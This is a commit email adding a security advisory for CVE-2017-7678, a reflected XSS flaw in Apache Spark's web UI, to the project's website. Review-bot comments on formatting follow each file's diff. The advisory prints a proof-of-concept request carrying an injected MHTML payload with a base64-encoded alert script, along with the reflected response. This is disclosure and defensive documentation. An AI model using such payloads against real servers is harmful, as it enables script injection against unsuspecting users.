Posted to commits@spark.apache.org by sr...@apache.org on 2017/07/12 10:24:58 UTC

spark-website git commit: Add note about CVE-2017-7678

Repository: spark-website
Updated Branches:
  refs/heads/asf-site f2d5d2a68 -> 1c7fd01e9


Add note about CVE-2017-7678


Project: http://git-wip-us.apache.org/repos/asf/spark-website/repo
Commit: http://git-wip-us.apache.org/repos/asf/spark-website/commit/1c7fd01e
Tree: http://git-wip-us.apache.org/repos/asf/spark-website/tree/1c7fd01e
Diff: http://git-wip-us.apache.org/repos/asf/spark-website/diff/1c7fd01e

Branch: refs/heads/asf-site
Commit: 1c7fd01e9eb258407da07dc765444e4cf8c28f7c
Parents: f2d5d2a
Author: Sean Owen <so...@cloudera.com>
Authored: Wed Jul 12 11:24:41 2017 +0100
Committer: Sean Owen <so...@cloudera.com>
Committed: Wed Jul 12 11:24:41 2017 +0100

----------------------------------------------------------------------
 security.md        | 43 ++++++++++++++++++++++++++++++++++++++++++-
 site/security.html | 42 +++++++++++++++++++++++++++++++++++++++++-
 2 files changed, 83 insertions(+), 2 deletions(-)
----------------------------------------------------------------------


http://git-wip-us.apache.org/repos/asf/spark-website/blob/1c7fd01e/security.md
----------------------------------------------------------------------
diff --git a/security.md b/security.md
index 505c225..a26f1d1 100644
--- a/security.md
+++ b/security.md
@@ -17,4 +17,45 @@ non-public list that will reach the Spark PMC. Messages to `security@apache.org`
 
 <h2>Known Security Issues</h2>
 
-None yet.
\ No newline at end of file
+<h3 id="CVE-2017-7678">CVE-2017-7678 Apache Spark XSS web UI MHTML vulnerability</h3>
+
+Severity: Low
+
+Vendor: The Apache Software Foundation
+
+Versions Affected:
+Versions of Apache Spark before 2.2.0
+
+Description:
+It is possible for an attacker to take advantage of a user's trust in the server to trick them into visiting a link that points to a shared Spark cluster and submits data including MHTML to the Spark master, or history server. This data, which could contain a script, would then be reflected back to the user and could be evaluated and executed by MS Windows-based clients. It is not an attack on Spark itself, but on the user, who may then execute the script inadvertently when viewing elements of the Spark web UIs.
+
+Mitigation:
+Update to Apache Spark 2.2.0 or later.
+
+Example:
+Request:
+```
+GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
+_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
+Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
+HTTP/1.1
+```
+
+Excerpt from response:
+```
+<div class="row-fluid">No running application with ID Content-Type: multipart/related;
+boundary=_AppScan
+--_AppScan
+Content-Location:foo
+Content-Transfer-Encoding:base64
+PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
+</div>
+```
+Result: In the above payload the BASE64 data decodes as:
+```
+<html><script>alert("XSS")</script></html>
+```
+
+Credit:
+- Mike Kasper, Nicholas Marion
+- IBM z Systems Center for Secure Engineering
\ No newline at end of file
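Review bot: the request in the `Example:` block is wrapped across four lines (`GET /app/?appId=...boundary=_AppScan%0d%0a--`, then `_AppScan%0d%0a...Content-Transfer-`, then `Encoding:base64...`, then `HTTP/1.1`), so the fenced block renders as a multi-line request that splits the `Content-Transfer-Encoding` header name and cannot be pasted or replayed; put the request line on a single line, or say in the text that it is wrapped for display. `Mitigation:` names only the fixed version; one sentence on what 2.2.0 changed in how `appId` is echoed into the "No running application with ID" message, plus a link to the fixing JIRA or commit, would let readers of the `Known Security Issues` page verify a backport. Minor: the replaced `None yet.` had no trailing newline and the new text still ends with `\ No newline at end of file`; add one.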

http://git-wip-us.apache.org/repos/asf/spark-website/blob/1c7fd01e/site/security.html
----------------------------------------------------------------------
diff --git a/site/security.html b/site/security.html
index 83345d3..3ef0942 100644
--- a/site/security.html
+++ b/site/security.html
@@ -204,7 +204,47 @@ non-public list that will reach the Spark PMC. Messages to <code>security@apache
 
 <h2>Known Security Issues</h2>
 
-<p>None yet.</p>
+<h3 id="CVE-2017-7678">CVE-2017-7678 Apache Spark XSS web UI MHTML vulnerability</h3>
+
+<p>Severity: Low</p>
+
+<p>Vendor: The Apache Software Foundation</p>
+
+<p>Versions Affected:
+Versions of Apache Spark before 2.2.0</p>
+
+<p>Description:
+It is possible for an attacker to take advantage of a user&#8217;s trust in the server to trick them into visiting a link that points to a shared Spark cluster and submits data including MHTML to the Spark master, or history server. This data, which could contain a script, would then be reflected back to the user and could be evaluated and executed by MS Windows-based clients. It is not an attack on Spark itself, but on the user, who may then execute the script inadvertently when viewing elements of the Spark web UIs.</p>
+
+<p>Mitigation:
+Update to Apache Spark 2.2.0 or later.</p>
+
+<p>Example:
+Request:</p>
+<pre><code>GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
+_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
+Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
+HTTP/1.1
+</code></pre>
+
+<p>Excerpt from response:</p>
+<pre><code>&lt;div class="row-fluid"&gt;No running application with ID Content-Type: multipart/related;
+boundary=_AppScan
+--_AppScan
+Content-Location:foo
+Content-Transfer-Encoding:base64
+PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
+&lt;/div&gt;
+</code></pre>
+<p>Result: In the above payload the BASE64 data decodes as:</p>
+<pre><code>&lt;html&gt;&lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/html&gt;
+</code></pre>
+
+<p>Credit:</p>
+<ul>
+  <li>Mike Kasper, Nicholas Marion</li>
+  <li>IBM z Systems Center for Secure Engineering</li>
+</ul>
 
   </div>
 </div>
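Review bot: the `<pre><code>` request block carries the same line breaks as security.md (`...boundary=_AppScan%0d%0a--`, then `_AppScan%0d%0a...Content-Transfer-`, then `Encoding:base64...`), so the rendered page shows a broken header name and a request that does not replay; since this file mirrors security.md, fix the markdown source and regenerate rather than patching the HTML by hand. The `&#8217;` entity and the `&lt;`/`&gt;` escaping in the response excerpt and decoded-payload blocks look right, and the `id="CVE-2017-7678"` anchor matches the heading id in security.md.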

